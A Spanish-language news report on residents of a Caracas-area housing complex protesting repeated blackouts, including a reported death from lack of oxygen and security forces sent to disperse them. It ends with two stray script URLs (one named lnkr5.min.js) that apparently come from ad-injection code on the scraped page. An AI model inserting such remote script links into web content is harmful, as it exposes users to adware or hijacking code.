Al lugar se trasladaron comisiones de la GNB y la PNB para dispersar la protesta.

Vecinos de la Misión Vivienda ubicada en la Urbanización La Paz, municipio Libertador, protestan este miércoles debido a fallas en el suministro eléctrico.

Al grito de, ¡queremos luz!, los ciudadanos reclaman las continuas interrupciones el servicio.

Como medida de protesta los habitantes del sector mantienen trancado el paso vehicular con cauchos en llamas, reportó la periodista Neidy Freytes en Twitter.

Los ciudadanos también denuncian que una mujer falleció por falta de oxigeno al no poder ser trasladada a un centro asistencial debido a la falta del servicio eléctrico.

«Esta mañana sacaron a una señora por falta de oxígeno del piso 12 de la Torre H y no hallaban como bajarla debido a que todos los pasillos se encontraban a oscuras. A las 9:00 am llegó la policía y la sacaron muerta», indicó uno de los manifestantes.

Los habitantes del sector aseveraron además que al gobierno no ha podido resolver ninguno de los problemas que aquejan a los venezolanos.

«Yo creo que fracasó el movimiento revolucionario fracasó. A Maduro se le escapó todo de las manos, la electricidad, la economía, la educació, todo», aseguraron.

Al lugar de se trasladaron funcionarios de la Guardia Nacional Bolivariana (GNB) y la Policía Nacional Bolivariana (PNB) para dispersar la protesta.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533165979589https://devlinkin.xyz/addons/lnkr5.min.js

Loading...